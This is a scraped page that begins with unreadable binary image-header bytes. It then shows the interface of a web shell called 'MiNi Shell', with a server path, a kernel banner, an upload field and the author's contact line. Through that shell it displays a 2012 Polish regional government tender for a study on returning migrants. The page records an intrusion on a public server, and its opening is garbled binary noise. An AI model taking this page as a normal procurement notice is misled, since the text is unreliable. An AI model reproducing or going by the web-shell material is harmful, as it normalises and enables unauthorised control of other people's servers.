JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120321/64781-N-2012.html

<p class="kh_header"><b>Kielce: Wykonanie badania pn.Analiza barier dla skutecznej kapitalizacji powracających</b><br>
<b>Numer ogłoszenia: 64781 - 2012; data zamieszczenia: 21.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego , al. IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 41 3421901, 3421677, 3421576, faks 41 3445265, 3445723.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sejmik.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie badania pn.Analiza barier dla skutecznej kapitalizacji powracających.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie usługi pn. Analiza barier dla skutecznej kapitalizacji powracających w formie 2 odrębnych Raportów, następujących po sobie w półrocznym odstępie czasowym, sporządzonych w dwóch wersjach językowych (polskiej i angielskiej), w ramach realizowanego projektu partnerskiego pn. Re-Turn - Regions benefitting from returning migrants ( Regionalne korzyści płynące z powrotu migrantów), współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu dla Europy Środkowej 2007-2013.
1.1	Projekt Re-Turn to projekt badawczo-szkoleniowy, którego głównym celem jest reintegracja społeczno - zawodowa osób wykluczonych lub zagrożonych wykluczeniem z powodu długotrwałej nieobecności w kraju. Powstał na przełomie 2009 2010 roku, w wyniku utworzenia grupy partnerów zainteresowanych problematyką migracji w Europie. Projektodawcą i Partnerem Wiodącym jest Regionalny Instytut Geografii w Lipsku. Konsorcjum projektu Re-Turn składa się z 12 partnerów z 7 krajów Unii Europejskiej: Niemcy, Austria, Włochy, Polska, Czechy, Słowenia i Węgry. Projekt adresowany jest do określonej grupy powracających emigrantów, władz regionalnych, organizacji rynku pracy, pośredników zajmujących się szkoleniami i podnoszeniem kwalifikacji, stowarzyszeń biznesowych oraz organizacji pracodawców. 
1.2	Cele projektu:
-	oszacowanie obecnej skali migracji powrotnych z zagranicy (reemigracji) w region województwa świętokrzyskiego;
-	nakreślenie profilu społeczno-demograficznego świętokrzyskich reemigrantów;
-	określenie potencjału ekonomicznego, kulturowego i społecznego powracających;
-	diagnozę zachowań ekonomicznych i losów zawodowych tej grupy;
-	poznanie struktury, kwalifikacji, pragnień i potrzeb powracających;
-	opracowanie narzędzi pomocowych i wdrożenie strategii rozwiązywania problemów;
-	określenie kierunków i rodzaju wpływu reemigracji na rozwój województwa świętokrzyskiego;
-	sformułowanie rekomendacji służących wykorzystaniu potencjału powracających;
-	zdefiniowanie sposobów lokalnego, regionalnego, narodowego i europejskiego planu wsparcia, oferowanego osobom powracającym;
-	określenie polityki przyciągania i zachęcania do powrotu wykształconych migrantów;
-	zgromadzenie i upowszechnienie historii reemigrantów, dla których powrót okazał się sukcesem, wskazanie elementów, które o tym zadecydowały.
1.3	Celem badania, stanowiącego przedmiot zamówienia będzie:
Zebranie istniejącej wiedzy zarówno teoretycznej jak i metodologicznej na temat najnowszej reemigracji osób z regionu województwa świętokrzyskiego oraz reintegracji po powrocie do społeczeństwa, z którego wcześniej wyjechali. 
1.4	Realizacja badania podzielona będzie na następujące Zadania:
Zadanie 1. Analiza barier dla skutecznej kapitalizacji powracających ( Raport I).
Zadanie 2. Analiza barier dla skutecznej kapitalizacji powracających ( Raport II).
Szczegółowy zakres i opis przedmiotu zamówienia zawarty został w Załączniku nr 1 do SIWZ. 
Wyniki prac wykonawcy sporządzane w formie opracowań pisemnych, w postaci papierowej i elektronicznej, przekazywane będą Zamawiającemu w wymaganych terminach, określonych w Załączniku Nr 1 do SIWZ.
Cenę oferty Wykonawca oblicza uwzględniając wszystkie koszty związane z wykonywaniem usługi. Wyliczoną cenę wykonawca podaje w Dodatku nr 1 do SIWZ - Formularz oferty, który musi być wypełniony zgodnie z wymaganiami Zamawiającego i podpisany przez Wykonawcę. 
Zamawiający wymaga, aby usługa wykonana została przez Wykonawcę zgodnie z wytycznymi Zamawiającego z zachowaniem wysokiej jakości wykonanych prac.
Zamawiający dopuszcza powierzenie wykonania zamówienia podwykonawcom. W takim przypadku zamawiający żąda wskazania przez Wykonawcę w swojej ofercie części (zakres) zamówienia, którą zamierza powierzyć podwykonawcom. Nie dopełnienie ww obowiązku oznaczać będzie, iż Wykonawca wykona przedmiot zamówienia samodzielnie.
Zlecenie części przedmiotu zamówienia podwykonawcom nie zmienia zobowiązań Wykonawcy wobec Zamawiającego. Wykonawca będzie odpowiedzialny za działania, uchybienia i zaniedbania podwykonawców i ich pracowników w takim samym stopniu jakby to były działania, uchybienia i zaniedbania jego własnych pracowników. 
Szczegółowe zasady określające sposób realizacji zamówienia, rozliczeń, oraz wysokość kar umownych zawarte zostały w Dodatku nr 4 do SIWZ -wzór umowy.
Rozliczenia między Zamawiającym i Wykonawcą prowadzone będą w złotych polskich.
Zamawiający nie dopuszcza składania ofert wariantowych. 
Zamawiający nie przewiduje:
zawarcia umowy ramowej,
udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy,
aukcji elektronicznej,
zwrotu kosztów udziału w postępowaniu.
TERMIN WYKONANIA ZAMÓWIENIA
Termin wykonania zamówienia -15 października 2012 roku, w tym
Dla Zadania Nr 1( Raport 1)-	w terminie 30 dni od daty zawarcia umowy
Dla Zadania Nr 2 ( Raport2)-	do 15 października 2012 roku.
Wykonawca zobowiązany jest wykonać przedmiot zamówienia dla poszczególnych zadań zgodnie z harmonogramem określonym w pkt. 9 załącznika Nr 1 do SIWZ (Szczegółowy opis przedmiotu zamówienia). 

Szczegółowy opis zadań zawarty jest w załączniku nr 1 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-6, 71.24.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają odpowiednią wiedzę i doświadczenie niezbędne do wykonywania zamówienia tj. w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie co najmniej jedną usługę o wartości brutto nie niższej niż 30.000,00 zł, której tematyka dotyczyła analizy sytuacji społeczno-gospodarczej w danym regionie lub w danym kraju i w ramach której zastosowane zostały co najmniej 2 następujące metody badawcze: Analiza dokumentów (desk research), Indywidualne wywiady pogłębione.Zamawiający oceni spełnianie tego warunku metodą spełnia- nie spełnia na podstawie załączonego wraz z ofertą przez Wykonawcę wykazu usług (co najmniej jednej  usługi o wartości nie mniejszej niż 30 000,00 złotych brutto, potwierdzającej spełnianie warunku posiadania wiedzy i doświadczenia określonego wyżej, z podaniem jej wartości, przedmiotu, daty wykonania i odbiorcy, wg wzoru określonego w Dodatku nr 3A do SIWZ, oraz załączenia dokumentów potwierdzających, że usługa ta została wykonana należycie - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę; 
Uwaga ! 
W przypadku podania wartości danego zamówienia w walucie obcej, zamawiający dokona przeliczenia tej wartości na wartość w złotych według średniego kursu NBP dla danej waluty z dnia publikacji ogłoszenia o zamówieniu Biuletynie Zamówień Publicznych. Jeżeli w dniu ukazania się ogłoszenia o zamówieniu, NBP nie opublikuje informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń wg. średniego kursu z pierwszego, kolejnego dnia, w którym NBP opublikuje ww. informacje.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują odpowiednim potencjałem technicznym niezbędnym do wykonania zamówienia. Zamawiający oceni spełnianie tego warunku metodą spełnia nie spełnia na podstawie oświadczenia z art. 22 ustawy Pzp
złożonego przez Wykonawcę wg wzoru stanowiacego Dodatek nr 2A do SIWZ-oryginał</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia i w powyższym zakresie wykażą, że do wykonania zamówienia zapewnią zespół specjalistów o wiedzy i doświadczeniu adekwatnym do podejmowanych zadań, płynności realizacji badania oraz harmonogramu, składający się z Kierownika Zespołu oraz nie mniej niż 2
(dwóch) Ekspertów o następujących kwalifikacjach: 1) Kierownik Zespołu -posiadający
wykształcenie wyższe oraz doświadczenie w prowadzeniu badań ewaluacyjnych oraz badań
ilościowych i lub jakościowych (brał udział w realizacji przynajmniej dwóch badań
ewaluacyjnych), oraz doświadczenie w kierowaniu zespołem badawczym (kierował przynajmniej
jednym badaniem społecznym i lub badaniem ewaluacyjnym), 2) Eksperci muszą posiadać
wykształcenie wyższe oraz doświadczenie w prowadzeniu badań społecznych i lub badań
ewaluacyjnych, w zakresie badań ilościowych i lub jakościowych (brały udział w realizacji
przynajmniej dwóch badań społecznych i lub badań ewaluacyjnych).Zamawiający oceni
spełnianie tego warunku metodą spełnia nie spełnia na podstawie wykazu osób, które będą
uczestniczyć w wykonywaniu zamówienia - wraz z informacjami na temat ich kwalifikacji
zawodowych, doświadczenia niezbędnego do wykonania zamówienia, a także zakresu
wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami,
potwierdzający spełnianie warunku określonego wyżej w zakresie dysponowania osobami
zdolnymi do wykonania zamówienia - wg wzoru stanowiącego dodatek nr 3B do SIWZ-oryginał
lub kopia poświadczona za zgodność z oryginałem przez wykonawcę;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy znajdują się w sytuacji
ekonimicznej i finansowej zapewniającej prawidłową realizację zamówienia.Zamawiający oceni
spełnianie tego warunku metodą spełnia nie spełnia na podstawie oświadczenia z art. 22 ustawy Pzp złożonego przez Wykonawcę wg wzoru stanowiacego Dodatek nr 2A do SIWZ-oryginał;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony Formularz oferty - wg wzoru określonego w Dodatku nr 1 do SIWZ. 2. W przypadku
wspólnego ubiegania się o udzielenie zamówienia Wykonawców występujących wspólnie (dotyczy również
spółki cywilnej) - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia
publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego
(oryginał lub poświadczona notarialnie kopia). 3. Pełnomocnictwo określające jego zakres - w przypadku
gdy Wykonawcę reprezentuje pełnomocnik (oryginał, poświadczona notarialnie kopia). 4.Wykonawca, który
będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania
zamówienia lub zdolnościach finansowych innych podmiotów (art. 26 ust. 2b) zobowiązany jest do złożenia
pisemnych zobowiązań tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres
korzystania z nich przy wykonywaniu zamówienia -oryginał podpisany przez podmiot.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sejmik.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego
al.IX Wieków Kielc 3; 25-516 Kielce budynek C-2 III piętro pokój nr 347..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2012 godzina 12:00, miejsce: siedziba Zamawiającego al.IX Wieków Kielc 3; 25-516 Kielce budynek C-2 I piętro
pokój nr 146 ( kancelaria ogólna)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach Programu dla Europy Środkowej 2007-2013. Priorytet I
Wspieranie innowacyjności na obszarze Europy Środkowej, Działanie 1.3 Wspieranie rozwoju wiedzy,
Projekt pn. Re-turn - Regions benefitting from returning migrants ( Regionalne korzyści płynące z powrotu
migrantów), współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju
Regionalnego w ramach Programu Europejskiej Współpracy Terytorialnej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com